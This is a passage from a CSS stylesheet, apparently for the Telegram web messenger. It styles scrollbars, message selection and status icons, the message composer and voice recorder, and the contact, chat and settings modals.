  2676. .stickerset_modal_col .nano > .nano-pane {
  2677. top: 4px;
  2678. bottom: 4px;
  2679. width: 5px;
  2680. right: 4px;
  2681. }
  2682. .im_dialogs_modal_col .nano > .nano-pane {
  2683. width: 6px;
  2684. right: 2px;
  2685. top: 10px;
  2686. }
  2687. .im_history_col .nano > .nano-pane {
  2688. top: 10px;
  2689. right: 8px;
  2690. }
  2691. .im_history_col .nano > .nano-pane > .nano-slider,
  2692. .contacts_modal_col .nano > .nano-pane > .nano-slider,
  2693. .sessions_modal_col .nano > .nano-pane > .nano-slider,
  2694. .stickerset_modal_col .nano > .nano-pane > .nano-slider,
  2695. .im_dialogs_modal_col .nano > .nano-pane > .nano-slider {
  2696. background: rgba(137, 160, 179, 0.5);
  2697. /*50% 89a0b3*/
  2698. margin: 0;
  2699. -webkit-border-radius: 2px;
  2700. -moz-border-radius: 2px;
  2701. border-radius: 2px;
  2702. }
  2703. .reply_markup_scrollable_container .nano > .nano-pane {
  2704. background: rgba(137, 160, 179, 0.1);
  2705. right: 2px;
  2706. width: 3px;
  2707. top: 0;
  2708. bottom: 0;
  2709. -webkit-border-radius: 1px;
  2710. -moz-border-radius: 1px;
  2711. border-radius: 1px;
  2712. }
  2713. .reply_markup_scrollable_container .nano > .nano-pane > .nano-slider {
  2714. -webkit-border-radius: 1px;
  2715. -moz-border-radius: 1px;
  2716. border-radius: 1px;
  2717. background: #d1d1d1;
  2718. background: rgba(137, 160, 179, 0.5);
  2719. margin: 0;
  2720. }
  2721. .im_history_no_dialogs_wrap {
  2722. margin: 122px 170px 60px;
  2723. text-align: center;
  2724. }
  2725. .im_history_appending {
  2726. -webkit-transition: all ease-in-out 0.2s;
  2727. -moz-transition: all ease-in-out 0.2s;
  2728. -ms-transition: all ease-in-out 0.2s;
  2729. -o-transition: all ease-in-out 0.2s;
  2730. transition: all ease-in-out 0.2s;
  2731. }
  2732. .im_history_typing_wrap {
  2733. line-height: 18px;
  2734. width: 100%;
  2735. height: 39px;
  2736. overflow: hidden;
  2737. -webkit-user-select: none;
  2738. }
  2739. .im_history_typing {
  2740. font-size: 11px;
  2741. color: #999;
  2742. max-width: 556px;
  2743. margin: 0 auto;
  2744. padding: 13px 81px 8px 85px;
  2745. }
  2746. .im_history_typing a.im_history_typing_author {
  2747. color: #999;
  2748. font-weight: bold;
  2749. }
  2750. .im_history_loading_less {
  2751. margin-top: 5px;
  2752. }
  2753. /* Contacts modal */
  2754. .contacts_modal_window .modal-dialog {
  2755. max-width: 420px;
  2756. }
  2757. .contacts_modal_members_list {
  2758. padding-top: 10px;
  2759. }
  2760. .contacts_modal_members_list a.contacts_modal_contact {
  2761. padding: 8px 16px;
  2762. }
  2763. .contacts_modal_members_list .active a.contacts_modal_contact,
  2764. .contacts_modal_members_list .active a.contacts_modal_contact:hover {
  2765. background: #6490b1;
  2766. color: #fff;
  2767. }
  2768. .contacts_modal_members_list .active a.contacts_modal_contact .md_modal_list_peer_description,
  2769. .contacts_modal_members_list .active a.contacts_modal_contact:hover .md_modal_list_peer_description,
  2770. .contacts_modal_members_list .active a.contacts_modal_contact .md_modal_list_peer_description .status_online {
  2771. color: #fff;
  2772. }
  2773. .session_terminate_btn {
  2774. opacity: 0;
  2775. }
  2776. .sessions_modal_session:hover .session_terminate_btn {
  2777. opacity: 1;
  2778. }
  2779. /* Messages edit panel */
  2780. .im_edit_delete_btn,
  2781. .im_edit_forward_btn,
  2782. .im_edit_reply_btn,
  2783. .im_start_btn {
  2784. border-radius: 2px;
  2785. padding: 7px 17px;
  2786. font-weight: bold;
  2787. font-size: 12px;
  2788. line-height: 18px;
  2789. margin: 6px 0 6px 14px;
  2790. }
  2791. .im_edit_panel_wrap {
  2792. padding: 0px 0 41px;
  2793. margin: 0 24px 0 12px;
  2794. }
  2795. .im_edit_panel_border {
  2796. display: block;
  2797. margin: 0 0 42px 3px;
  2798. border-bottom: 1px solid #EEE;
  2799. }
  2800. .im_edit_cancel_link {
  2801. display: block;
  2802. padding: 7px 17px;
  2803. border-radius: 2px;
  2804. overflow: hidden;
  2805. margin: 6px 6px;
  2806. float: right;
  2807. }
  2808. .im_edit_selected_actions {
  2809. text-align: left;
  2810. text-transform: uppercase;
  2811. }
  2812. .im_edit_start_actions {
  2813. text-align: center;
  2814. text-transform: uppercase;
  2815. }
  2816. .im_start_btn {
  2817. padding: 7px 25px;
  2818. }
  2819. .im_selected_count {
  2820. color: #b9cfe3;
  2821. }
  2822. .im_submit {
  2823. color: #499dd9;
  2824. font-size: 13px;
  2825. line-height: 18px;
  2826. height: 18px;
  2827. border-radius: 0;
  2828. float: right;
  2829. min-width: 0;
  2830. margin-top: 5px;
  2831. margin-left: 10px;
  2832. width: auto;
  2833. padding: 0;
  2834. font-weight: bold;
  2835. }
  2836. .im_submit:hover {
  2837. color: #3589c5;
  2838. background: inherit;
  2839. }
  2840. .im_submit_edit_label,
  2841. .im_submit_edit .im_submit_send_label {
  2842. display: none;
  2843. }
  2844. .im_submit_edit .im_submit_edit_label {
  2845. display: inline;
  2846. }
  2847. .composer_emoji_panel {
  2848. display: block;
  2849. height: 30px;
  2850. overflow: hidden;
  2851. max-width: 210px;
  2852. }
  2853. .composer_emoji_panel a.composer_emoji_btn {
  2854. display: inline-block;
  2855. padding: 5px;
  2856. outline: 0;
  2857. border-radius: 2px;
  2858. margin: -1px 0 2px -1px;
  2859. }
  2860. .im_message_selected .im_message_date,
  2861. .im_message_selected .im_message_document_size,
  2862. .im_message_selected .im_message_audio_duration,
  2863. .im_message_selected .im_message_audio_size,
  2864. .im_message_selected .im_message_fwd_date,
  2865. .im_message_selected .im_message_author_admin,
  2866. .im_message_selected .im_message_views_cnt,
  2867. .im_message_selected .im_message_sign_link,
  2868. .im_history_select_active .im_message_outer_wrap:hover .im_message_date,
  2869. .im_history_select_active .im_message_outer_wrap:hover .im_message_document_size,
  2870. .im_history_select_active .im_message_outer_wrap:hover .im_message_audio_duration,
  2871. .im_history_select_active .im_message_outer_wrap:hover .im_message_audio_size,
  2872. .im_history_select_active .im_message_outer_wrap:hover .im_message_fwd_date,
  2873. .im_history_select_active .im_message_outer_wrap:hover .im_message_author_admin,
  2874. .im_history_select_active .im_message_outer_wrap:hover .im_message_views_cnt,
  2875. .im_history_select_active .im_message_outer_wrap:hover .im_message_sign_link {
  2876. color: #899daf;
  2877. }
  2878. .icon-select-tick {
  2879. display: none;
  2880. }
  2881. .im_dialogs_modal_list .im_dialog_wrap .im_dialog .icon-select-tick {
  2882. display: block;
  2883. margin: 10px 5px 0 -5px;
  2884. position: relative;
  2885. float: left;
  2886. width: 26px;
  2887. height: 26px;
  2888. background-image: /*savepage-url=../img/icons/IconsetW.png*/ url();
  2889. background-repeat: no-repeat;
  2890. background-position: -9px -481px;
  2891. opacity: 0.5;
  2892. }
  2893. .is_2x .im_dialogs_modal_list .im_dialog_wrap .im_dialog .icon-select-tick {
  2894. background-image: /*savepage-url=../img/icons/IconsetW_2x.png*/ url();
  2895. background-size: 42px 1171px;
  2896. }
  2897. .im_dialogs_modal_list .im_dialog_wrap:hover .im_dialog .icon-select-tick {
  2898. opacity: 0.75;
  2899. }
  2900. .icon-select-tick.dialog_selected {
  2901. opacity: 1 !important;
  2902. }
  2903. @media (min-width: 900px) {
  2904. .im_message_wrap {
  2905. position: relative;
  2906. }
  2907. .im_message_selected .icon-select-tick,
  2908. .im_history_selectable .im_message_outer_wrap:hover .icon-select-tick {
  2909. position: absolute;
  2910. width: 26px;
  2911. height: 26px;
  2912. margin: 9px 0 0 -59px;
  2913. display: block;
  2914. background-image: /*savepage-url=../img/icons/IconsetW.png*/ url();
  2915. background-repeat: no-repeat;
  2916. background-position: -9px -481px;
  2917. opacity: 0.5;
  2918. }
  2919. .is_2x .im_message_selected .icon-select-tick,
  2920. .is_2x .im_history_selectable .im_message_outer_wrap:hover .icon-select-tick {
  2921. background-image: /*savepage-url=../img/icons/IconsetW_2x.png*/ url();
  2922. background-size: 42px 1171px;
  2923. }
  2924. .im_message_selected .icon-select-tick {
  2925. opacity: 1 !important;
  2926. }
  2927. .im_grouped_short .icon-select-tick,
  2928. .im_grouped_short .im_message_outer_wrap:hover .icon-select-tick {
  2929. margin-top: -2px;
  2930. }
  2931. .im_message_fwd .icon-select-tick,
  2932. .im_message_outer_wrap:hover .im_message_fwd .icon-select-tick {
  2933. margin-top: 10px;
  2934. }
  2935. .im_grouped_fwd .icon-select-tick,
  2936. .im_grouped_fwd .im_message_outer_wrap:hover .icon-select-tick {
  2937. margin-top: 7px;
  2938. }
  2939. .im_grouped .icon-select-tick,
  2940. .im_grouped .im_message_outer_wrap:hover .icon-select-tick {
  2941. margin-top: 7px;
  2942. }
  2943. .im_grouped_fwd_short .icon-select-tick,
  2944. .im_grouped_fwd_short .im_message_outer_wrap:hover .icon-select-tick {
  2945. margin-top: -5px;
  2946. }
  2947. }
  2948. .icon-message-status {
  2949. pointer-events: none;
  2950. background: #4eabf1;
  2951. border: 0;
  2952. display: block;
  2953. width: 10px;
  2954. height: 10px;
  2955. border-radius: 7px;
  2956. position: absolute;
  2957. margin-left: -26px;
  2958. margin-top: 16px;
  2959. opacity: 0;
  2960. }
  2961. .im_message_unread .icon-message-status {
  2962. opacity: 1;
  2963. }
  2964. .im_message_pending .icon-message-status {
  2965. opacity: 0.5;
  2966. }
  2967. .im_grouped_short .icon-message-status {
  2968. margin-top: 5px;
  2969. }
  2970. .im_message_fwd .icon-message-status {
  2971. margin-top: 16px;
  2972. }
  2973. .im_grouped_fwd .icon-message-status {
  2974. margin-top: 13px;
  2975. }
  2976. .im_grouped .icon-message-status {
  2977. margin-top: 13px;
  2978. }
  2979. .im_grouped_fwd_short .icon-message-status {
  2980. margin-top: 2px;
  2981. }
  2982. /* Dialogs modal */
  2983. .peer_select_window .modal-dialog {
  2984. max-width: 420px;
  2985. }
  2986. .peer_select_modal_footer {
  2987. padding: 15px 10px 15px;
  2988. -webkit-box-shadow: 0 -1px 0px rgba(0, 0, 0, 0.05);
  2989. -moz-box-shadow: 0 -1px 0px rgba(0, 0, 0, 0.05);
  2990. box-shadow: 0 -1px 0px rgba(0, 0, 0, 0.05);
  2991. }
  2992. .peer_select_modal_recipients_wrap {
  2993. padding: 6px 0 0 10px;
  2994. white-space: nowrap;
  2995. max-width: 300px;
  2996. overflow: hidden;
  2997. text-overflow: ellipsis;
  2998. }
  2999. .peer_select_modal_recipients_empty,
  3000. .peer_select_modal_recipients_name {
  3001. color: #999;
  3002. }
  3003. .peer_select_modal_recipient {
  3004. display: inline-block;
  3005. white-space: nowrap;
  3006. max-width: 120px;
  3007. overflow: hidden;
  3008. text-overflow: ellipsis;
  3009. vertical-align: bottom;
  3010. }
  3011. a.peer_select_modal_share_link {
  3012. color: #999 !important;
  3013. }
  3014. @media (max-height: 600px), (max-width: 1010px) {
  3015. .im_page_wrap {
  3016. border-bottom: 0;
  3017. border-radius: 0;
  3018. -webkit-box-shadow: none;
  3019. -moz-box-shadow: none;
  3020. box-shadow: none;
  3021. }
  3022. .footer_wrap {
  3023. display: none;
  3024. }
  3025. }
  3026. .im_message_fwd_author_wrap {
  3027. margin: 1px 0 4px;
  3028. display: inline-block;
  3029. }
  3030. .im_message_fwd_author {
  3031. margin-right: 5px;
  3032. }
  3033. .im_message_fwd .im_message_fwd_author_wrap,
  3034. .im_message_fwd .im_message_text,
  3035. .im_message_fwd .im_message_media,
  3036. .im_message_fwd .im_message_sign {
  3037. margin-left: 52px;
  3038. }
  3039. .im_send_panel_wrap {
  3040. max-width: 554px;
  3041. padding-bottom: 21px;
  3042. }
  3043. .im_send_form {
  3044. max-width: 382px;
  3045. left: 70px;
  3046. right: 72px;
  3047. }
  3048. .im_panel_peer_photo,
  3049. .im_panel_own_photo {
  3050. width: 52px;
  3051. height: 52px;
  3052. line-height: 52px;
  3053. border-radius: 50%;
  3054. overflow: hidden;
  3055. }
  3056. div.im_panel_peer_photo,
  3057. a.im_panel_peer_photo {
  3058. cursor: pointer;
  3059. margin-left: 20px;
  3060. height: 55px;
  3061. }
  3062. a.im_panel_own_photo {
  3063. display: block;
  3064. margin-right: 18px;
  3065. }
  3066. a.im_panel_own_photo .peer_initials,
  3067. div.im_panel_peer_photo .peer_initials,
  3068. a.im_panel_peer_photo .peer_initials {
  3069. font-size: 18px;
  3070. line-height: 50px;
  3071. }
  3072. .im_panel_peer_online {
  3073. background: #6ec26d;
  3074. border: 2px solid #fff;
  3075. display: block;
  3076. width: 14px;
  3077. height: 14px;
  3078. border-radius: 7px;
  3079. overflow: hidden;
  3080. position: absolute;
  3081. margin-top: -12px;
  3082. margin-left: 36px;
  3083. }
  3084. .composer_emoji_insert_btn,
  3085. .composer_progress_icon_wrap,
  3086. .composer_command_btn,
  3087. .composer_keyboard_btn {
  3088. z-index: 1;
  3089. }
  3090. .composer_emoji_insert_btn:hover .icon-emoji {
  3091. opacity: 1;
  3092. }
  3093. .composer_emoji_insert_btn:active .icon-emoji,
  3094. .composer_emoji_insert_btn.composer_emoji_insert_btn_on .icon-emoji {
  3095. background-position: -9px -367px;
  3096. opacity: 1;
  3097. }
  3098. .im_send_field_wrap {
  3099. margin-bottom: 13px;
  3100. padding-bottom: 2px;
  3101. overflow-x: hidden;
  3102. }
  3103. .composer_rich_textarea,
  3104. .composer_textarea {
  3105. overflow: none;
  3106. overflow-y: scroll;
  3107. border-radius: 0;
  3108. border: 0;
  3109. box-shadow: none;
  3110. outline: none;
  3111. box-shadow: 0 1px 0 0 #e8e8e8;
  3112. padding: 1px 28px 1px 0;
  3113. position: relative;
  3114. margin: 0;
  3115. min-height: 52px;
  3116. line-height: 20px;
  3117. height: auto;
  3118. box-sizing: border-box;
  3119. }
  3120. .composer_rich_textarea:focus,
  3121. .composer_textarea:focus {
  3122. border: 0;
  3123. box-shadow: none;
  3124. outline: none;
  3125. box-shadow: 0 2px 0 0 #77b7e4;
  3126. }
  3127. .im_send_field_wrap_2ndbtn .composer_rich_textarea,
  3128. .im_send_field_wrap_2ndbtn .composer_textarea {
  3129. padding-right: 65px;
  3130. }
  3131. .icon-paperclip {
  3132. display: inline-block;
  3133. width: 18px;
  3134. height: 17px;
  3135. vertical-align: top;
  3136. opacity: 0.8;
  3137. margin: 0;
  3138. background-image: /*savepage-url=../img/icons/General.png*/ var(--savepage-url-3);
  3139. background-repeat: no-repeat;
  3140. background-position: -11px -455px;
  3141. }
  3142. .is_2x .icon-paperclip {
  3143. background-image: /*savepage-url=../img/icons/General_2x.png*/ url();
  3144. background-size: 40px 948px;
  3145. }
  3146. .im_attach {
  3147. cursor: pointer;
  3148. display: block;
  3149. overflow: hidden;
  3150. position: relative;
  3151. width: 18px;
  3152. height: 17px;
  3153. margin-right: 28px;
  3154. margin-top: 6px;
  3155. }
  3156. .im_attach:hover .icon-paperclip {
  3157. opacity: 1;
  3158. }
  3159. .im_attach:active .icon-paperclip {
  3160. background-position: -11px -482px;
  3161. opacity: 1;
  3162. }
  3163. .im_media_attach {
  3164. cursor: pointer;
  3165. display: block;
  3166. overflow: hidden;
  3167. position: relative;
  3168. padding: 0;
  3169. width: 20px;
  3170. height: 18px;
  3171. margin-top: 5px;
  3172. margin-right: 25px;
  3173. }
  3174. .icon-camera {
  3175. display: inline-block;
  3176. width: 20px;
  3177. height: 18px;
  3178. vertical-align: top;
  3179. opacity: 0.8;
  3180. background-image: /*savepage-url=../img/icons/General.png*/ var(--savepage-url-3);
  3181. background-repeat: no-repeat;
  3182. background-position: -10px -399px;
  3183. }
  3184. .is_2x .icon-camera {
  3185. background-image: /*savepage-url=../img/icons/General_2x.png*/ url();
  3186. background-size: 40px 948px;
  3187. }
  3188. .im_media_attach:hover .icon-camera {
  3189. opacity: 1;
  3190. }
  3191. .im_media_attach:active .icon-camera {
  3192. background-position: -10px -427px;
  3193. opacity: 1;
  3194. }
  3195. .im_record {
  3196. display: none;
  3197. width: 18px;
  3198. height: 23px;
  3199. margin-right: 15px;
  3200. user-select: none;
  3201. -moz-user-select: none;
  3202. -webkit-user-select: none;
  3203. -ms-user-select: none;
  3204. position: relative;
  3205. }
  3206. .im_record_supported .im_record {
  3207. display: block;
  3208. }
  3209. .im_record_bg {
  3210. position: absolute;
  3211. margin: -10px 0 0 -16px;
  3212. padding: 13px 16px 13px 16px;
  3213. width: 50px;
  3214. height: 50px;
  3215. border-radius: 50px;
  3216. overflow: hidden;
  3217. background: #fff;
  3218. transition: background-color linear 0.2s;
  3219. }
  3220. .im_send_form_hover .im_voice_recording .im_record_bg {
  3221. background: #cae9ff;
  3222. }
  3223. .icon-mic {
  3224. display: inline-block;
  3225. width: 18px;
  3226. height: 22px;
  3227. vertical-align: text-top;
  3228. opacity: 0.8;
  3229. background-image: /*savepage-url=../img/icons/IconsetW.png*/ url();
  3230. background-repeat: no-repeat;
  3231. background-position: -12px -285px;
  3232. background-color: transparent;
  3233. }
  3234. .is_2x .icon-mic {
  3235. background-image: /*savepage-url=../img/icons/IconsetW_2x.png*/ url();
  3236. background-size: 42px 1171px;
  3237. }
  3238. .im_record:hover .icon-mic {
  3239. opacity: 1;
  3240. }
  3241. .im_record:active .icon-mic,
  3242. .im_voice_recording .icon-mic {
  3243. background-position: -12px -705px;
  3244. }
  3245. .im_voice_recorder_wrap {
  3246. padding: 17px 10px 0;
  3247. display: none;
  3248. position: absolute;
  3249. }
  3250. .im_voice_recording .im_voice_recorder_wrap,
  3251. .im_processing_recording .im_voice_recorder_wrap {
  3252. display: block;
  3253. }
  3254. .im_voice_recording .composer_rich_textarea,
  3255. .im_processing_recording .composer_rich_textarea,
  3256. .im_voice_recording .im_message_field,
  3257. .im_processing_recording .im_message_field,
  3258. .im_voice_recording .composer_emoji_insert_btn,
  3259. .im_processing_recording .composer_emoji_insert_btn,
  3260. .im_voice_recording .composer_progress_icon_wrap,
  3261. .im_processing_recording .composer_progress_icon_wrap,
  3262. .im_voice_recording .composer_command_btn,
  3263. .im_processing_recording .composer_command_btn,
  3264. .im_voice_recording .composer_keyboard_btn,
  3265. .im_processing_recording .composer_keyboard_btn,
  3266. .im_voice_recording .im_inline_placeholder_wrap,
  3267. .im_processing_recording .im_inline_placeholder_wrap {
  3268. visibility: hidden;
  3269. }
  3270. @media (max-height: 600px) {
  3271. a.im_panel_peer_photo,
  3272. a.im_panel_own_photo {
  3273. display: none;
  3274. }
  3275. .im_send_field_wrap {
  3276. margin-bottom: 0;
  3277. }
  3278. .composer_rich_textarea,
  3279. .composer_textarea {
  3280. min-height: 27px;
  3281. padding-right: 25px;
  3282. }
  3283. .composer_progress_icon_wrap {
  3284. top: 0;
  3285. right: 0;
  3286. margin-top: 0;
  3287. }
  3288. .composer_emoji_insert_btn {
  3289. top: 0;
  3290. right: 0px;
  3291. margin-top: -1px;
  3292. }
  3293. .composer_command_btn {
  3294. top: 2px;
  3295. right: 35px;
  3296. }
  3297. .composer_keyboard_btn {
  3298. top: 2px;
  3299. right: 35px;
  3300. }
  3301. .composer_emoji_panel {
  3302. display: none;
  3303. }
  3304. .im_submit {
  3305. position: absolute;
  3306. top: 0;
  3307. left: 100%;
  3308. margin: 0 0 0 15px;
  3309. }
  3310. .im_record_supported .im_send_form_empty .im_submit {
  3311. display: none;
  3312. }
  3313. .im_media_attach {
  3314. position: absolute;
  3315. top: -6px;
  3316. left: -43px;
  3317. width: 19px;
  3318. height: 24px;
  3319. }
  3320. .icon-camera {
  3321. display: inline-block;
  3322. width: 19px;
  3323. height: 23px;
  3324. vertical-align: text-top;
  3325. opacity: 0.8;
  3326. margin-top: -1px;
  3327. background-image: /*savepage-url=../img/icons/IconsetW.png*/ url();
  3328. background-repeat: no-repeat;
  3329. background-position: -12px -68px;
  3330. }
  3331. .is_2x .icon-camera {
  3332. background-image: /*savepage-url=../img/icons/IconsetW_2x.png*/ url();
  3333. background-size: 42px 1171px;
  3334. }
  3335. .im_media_attach:hover .icon-camera,
  3336. .im_media_attach:active .icon-camera {
  3337. background-position: -12px -100px;
  3338. opacity: 1;
  3339. }
  3340. .im_attach {
  3341. display: none;
  3342. position: absolute;
  3343. top: 0;
  3344. right: 100%;
  3345. margin: 0;
  3346. margin-right: 45px;
  3347. margin-top: 1px;
  3348. }
  3349. .icon-emoji {
  3350. display: inline-block;
  3351. width: 22px;
  3352. height: 22px;
  3353. vertical-align: text-top;
  3354. opacity: 1;
  3355. margin: 0;
  3356. background-image: /*savepage-url=../img/icons/IconsetW.png*/ url();
  3357. background-repeat: no-repeat;
  3358. background-position: -10px -771px;
  3359. }
  3360. .is_2x .icon-emoji {
  3361. background-image: /*savepage-url=../img/icons/IconsetW_2x.png*/ url();
  3362. background-size: 42px 1171px;
  3363. }
  3364. .composer_emoji_insert_btn:active .icon-emoji,
  3365. .is_1x .composer_emoji_insert_btn:active .icon-emoji,
  3366. .composer_emoji_insert_btn.composer_emoji_insert_btn_on .icon-emoji,
  3367. .is_1x .composer_emoji_insert_btn.composer_emoji_insert_btn_on .icon-emoji {
  3368. background-position: -10px -803px;
  3369. }
  3370. .im_edit_panel_wrap {
  3371. padding-bottom: 8px;
  3372. }
  3373. .im_edit_panel_border {
  3374. margin-bottom: 7px;
  3375. }
  3376. .im_send_dropbox_wrap {
  3377. padding-top: 5px;
  3378. padding-bottom: 5px;
  3379. }
  3380. .im_record {
  3381. display: none;
  3382. position: absolute;
  3383. top: 5px;
  3384. right: -56px;
  3385. margin-top: -8px;
  3386. }
  3387. .im_record_supported .im_send_form_empty .im_record {
  3388. display: block;
  3389. }
  3390. .im_voice_recorder_wrap {
  3391. padding-top: 4px;
  3392. }
  3393. }
  3394. .im_edit_panel_wrap.im_edit_small_panel_wrap {
  3395. padding-bottom: 8px;
  3396. }
  3397. .im_edit_small_panel_wrap .im_edit_panel_border {
  3398. margin-bottom: 7px;
  3399. }
  3400. /* Peer modals */
  3401. .user_modal_window .modal-dialog {
  3402. max-width: 480px;
  3403. }
  3404. .user_modal_photo_profile_wrap {
  3405. padding: 13px 12px;
  3406. margin-bottom: 15px;
  3407. }
  3408. .user_modal_image_wrap {
  3409. display: block;
  3410. width: 100px;
  3411. margin-right: 22px;
  3412. overflow: hidden;
  3413. border-radius: 3px;
  3414. }
  3415. .user_modal_image {
  3416. width: 100px;
  3417. height: 100px;
  3418. }
  3419. .user_modal_header {
  3420. font-weight: bold;
  3421. margin: 2px 0 7px;
  3422. }
  3423. .user_modal_status {
  3424. color: #999;
  3425. margin-bottom: 15px;
  3426. }
  3427. .modal_section_body dt {
  3428. font-weight: normal;
  3429. display: inline-block;
  3430. width: 100px;
  3431. }
  3432. .modal_section_body dd {
  3433. display: inline-block;
  3434. }
  3435. .user_modal_main_btn {
  3436. border: 0;
  3437. font-size: 12px;
  3438. padding-left: 16px;
  3439. padding-right: 16px;
  3440. margin: 8px 10px 0 0;
  3441. float: left;
  3442. }
  3443. .user_modal_other_btn {
  3444. margin: 8px 0 0 0;
  3445. float: left;
  3446. }
  3447. .user_modal_other_btn .dropdown-toggle {
  3448. border: 0;
  3449. font-size: 12px;
  3450. }
  3451. .user_modal_other_btn .dropdown-menu {
  3452. margin-left: -3px;
  3453. }
  3454. .user_modal_settings_wrap {
  3455. margin-top: 25px;
  3456. }
  3457. .user_modal_notifications {
  3458. font-weight: bold;
  3459. }
  3460. .user_modal_clear {
  3461. margin-top: 20px;
  3462. }
  3463. .chat_modal_window .modal-dialog {
  3464. max-width: 480px;
  3465. }
  3466. .chat_modal_header {
  3467. font-weight: bold;
  3468. margin: 0 0 10px;
  3469. }
  3470. .chat_modal_members_count {
  3471. color: #999;
  3472. margin-bottom: 16px;
  3473. }
  3474. .chat_modal_actions_wrap {
  3475. float: right;
  3476. position: relative;
  3477. width: 332px;
  3478. }
  3479. .chat_modal_actions_wrap > button,
  3480. .chat_modal_actions_wrap > .chat_modal_other_btn > button,
  3481. .chat_modal_actions_wrap > span.btn {
  3482. padding: 7px 10px;
  3483. }
  3484. .chat_modal_main_btn {
  3485. border: 0;
  3486. font-size: 12px;
  3487. padding-left: 16px;
  3488. padding-right: 16px;
  3489. float: left;
  3490. position: relative;
  3491. overflow: hidden;
  3492. margin-right: 10px;
  3493. margin-top: 8px;
  3494. }
  3495. .chat_modal_invite_btn {
  3496. border: 0;
  3497. font-size: 12px;
  3498. padding-left: 16px;
  3499. padding-right: 16px;
  3500. float: left;
  3501. position: relative;
  3502. margin-right: 10px;
  3503. margin-top: 8px;
  3504. }
  3505. .chat_modal_delete_btn {
  3506. border: 0;
  3507. font-size: 12px;
  3508. padding-left: 16px;
  3509. padding-right: 16px;
  3510. float: left;
  3511. margin-right: 10px;
  3512. margin-top: 8px;
  3513. }
  3514. .chat_modal_other_btn {
  3515. margin-top: 8px;
  3516. float: left;
  3517. }
  3518. .chat_modal_other_btn .dropdown-toggle {
  3519. border: 0;
  3520. font-size: 12px;
  3521. }
  3522. .chat_modal_other_btn .dropdown-menu {
  3523. margin-left: -3px;
  3524. }
  3525. .chat_modal_photo_update_link {
  3526. display: block;
  3527. padding: 5px 14px;
  3528. clear: both;
  3529. font-weight: normal;
  3530. line-height: 1.42857143;
  3531. color: #333333;
  3532. white-space: nowrap;
  3533. font-size: 13px;
  3534. overflow: hidden;
  3535. position: relative;
  3536. }
  3537. .chat_modal_photo_update_link:hover {
  3538. text-decoration: none;
  3539. color: #262626;
  3540. background-color: #f5f5f5;
  3541. }
  3542. .chat_modal_settings_wrap {
  3543. margin-top: 10px;
  3544. }
  3545. .settings_modal_window .modal-dialog {
  3546. max-width: 480px;
  3547. }
  3548. .settings_modal_settings {
  3549. padding: 4px 0;
  3550. margin: 0;
  3551. }
  3552. .settings_modal_wrap .user_modal_main_btn {
  3553. position: relative;
  3554. overflow: hidden;
  3555. }
  3556. .settings_profile_edit_form {
  3557. margin-bottom: 15px;
  3558. }
  3559. .settings_profile_image_wrap {
  3560. float: left;
  3561. width: 120px;
  3562. margin-right: 22px;
  3563. }
  3564. .settings_profile_first_name,
  3565. .settings_profile_last_name {
  3566. width: 180px;
  3567. float: left;
  3568. margin-bottom: 0;
  3569. }
  3570. .settings_profile_first_name label,
  3571. .settings_profile_last_name label {
  3572. margin-bottom: 3px;
  3573. }
  3574. .settings_profile_first_name {
  3575. margin-right: 22px;
  3576. margin-bottom: 10px;
  3577. }
  3578. .settings_profile_last_name {
  3579. margin-right: 10px;
  3580. margin-bottom: 15px;
  3581. }
  3582. .settings_profile_save {
  3583. padding-top: 21px;
  3584. float: left;
  3585. }
  3586. .settings_profile_save_btn {
  3587. width: 50px;
  3588. }
  3589. .settings_profile_edit_form {
  3590. margin-bottom: 0;
  3591. }
  3592. .settings_profile_edit_form input {
  3593. font-size: 12px;
  3594. line-height: normal;
  3595. background: #f2f2f2;
  3596. border: 1px solid #f2f2f2;
  3597. border-radius: 0;
  3598. padding: 6px 6px 6px 6px;
  3599. margin-bottom: 0;
  3600. margin: 0;
  3601. }
  3602. .settings_profile_edit_form input:focus,
  3603. .settings_profile_edit_form input:active {
  3604. background-color: #fff;
  3605. }
  3606. .settings_send_choose_form input {
  3607. margin-top: 2px;
  3608. }
  3609. .settings_send_choose_form {
  3610. margin-bottom: 20px;
  3611. }
  3612. .settings_user_phone,
  3613. .settings_version {
  3614. color: #999;
  3615. }
  3616. .modal_section_body dl.settings_modal_language {
  3617. margin: 3px 0;
  3618. }
  3619. .modal_section_body dl.settings_modal_language dt {
  3620. padding-top: 2px;
  3621. }
  3622. .settings_modal_language_select {
  3623. font-size: 12px;
  3624. height: 21px;
  3625. line-height: 21px;
  3626. padding: 0;
  3627. }
  3628. a.settings_modal_content_settings_wrap {
  3629. margin-top: -5px;
  3630. }
  3631. .icon-volume-outer {
  3632. display: inline-block;
  3633. background: #c7c7c7;
  3634. border-radius: 10px;
  3635. overflow: hidden;
  3636. height: 18px;
  3637. padding: 5px 8px;
  3638. margin: 0 9px 0 0;
  3639. width: 32px;
  3640. }
  3641. .icon-volume-inner {
  3642. display: block;
  3643. background: #fff;
  3644. float: left;
  3645. width: 2px;
  3646. vertical-align: bottom;
  3647. margin: 0 1px 0;
  3648. height: 8px;
  3649. }
  3650. .icon-volume-inner1 {
  3651. height: 2px;
  3652. margin-top: 6px;
  3653. }
  3654. .icon-volume-inner2 {
  3655. height: 4px;
  3656. margin-top: 4px;
  3657. }
  3658. .icon-volume-inner3 {
  3659. height: 6px;
  3660. margin-top: 2px;
  3661. }
  3662. .icon-volume-outer1 .icon-volume-inner2,
  3663. .icon-volume-outer1 .icon-volume-inner3,
  3664. .icon-volume-outer1 .icon-volume-inner4,
  3665. .icon-volume-outer2 .icon-volume-inner3,
  3666. .icon-volume-outer2 .icon-volume-inner4,
  3667. .icon-volume-outer3 .icon-volume-inner4 {
  3668. display: none;
  3669. }
  3670. .settings_volume_slider {
  3671. width: 100%;
  3672. max-width: 362px;
  3673. display: inline-block;
  3674. }
  3675. .im_message_selected .im_message_outer_wrap {
  3676. background: #f2f6fa;
  3677. }
  3678. .im_history_selectable .im_message_outer_wrap {
  3679. cursor: pointer;
  3680. }
  3681. .im_history_select_active .im_message_outer_wrap:hover {
  3682. background: #f2f6fa;
  3683. }
  3684. .im_message_wrap {
  3685. max-width: 560px;
  3686. padding: 0 15px 0 15px;
  3687. margin: 0 auto;
  3688. position: static;
  3689. }
  3690. .im_content_message_wrap {
  3691. margin: 8px 10px 8px 16px;
  3692. }
  3693. .im_message_views_wrap {
  3694. width: 0;
  3695. }
  3696. .im_grouped .im_message_views_wrap,
  3697. .im_grouped_short .im_message_views_wrap,
  3698. .im_grouped_fwd .im_message_views_wrap,
  3699. .im_grouped_fwd_short .im_message_views_wrap {
  3700. display: none;
  3701. }
  3702. .im_message_selected.im_grouped .im_message_views_wrap,
